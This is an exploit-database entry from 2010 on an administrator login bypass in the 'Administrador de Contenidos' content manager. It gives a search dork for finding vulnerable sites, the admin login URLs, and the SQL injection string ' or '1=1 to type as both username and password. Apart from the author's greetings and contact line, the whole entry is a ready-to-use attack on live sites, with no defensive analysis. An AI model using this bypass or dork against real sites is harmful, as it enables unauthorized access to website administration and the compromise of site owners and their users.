[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Administrador de Contenidos Admin Login Bypass vulnerability
# Published : 2010-05-07
# Author : Ra3cH
# Previous Title : ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability
# Next Title : GetSimple 2.01 LFI
************************************************************
** Administrador de Contenidos Admin Login Bypass vulnerability
************************************************************
** Prodcut: Administrador de Contenidos
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Admin Bypass
** Risk : High
** Dork : "Dise?o Web Hernest Consulting S.L."
************************************************************
** Discovred by: Ra3cH
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen
************************************************************
** Exploit:
** http://[PATH]/admin or http://[PATH]/admin/Login.Asp
**
** user : ' or '1=1
** password : ' or '1=1
**
************************************************************
************************************************************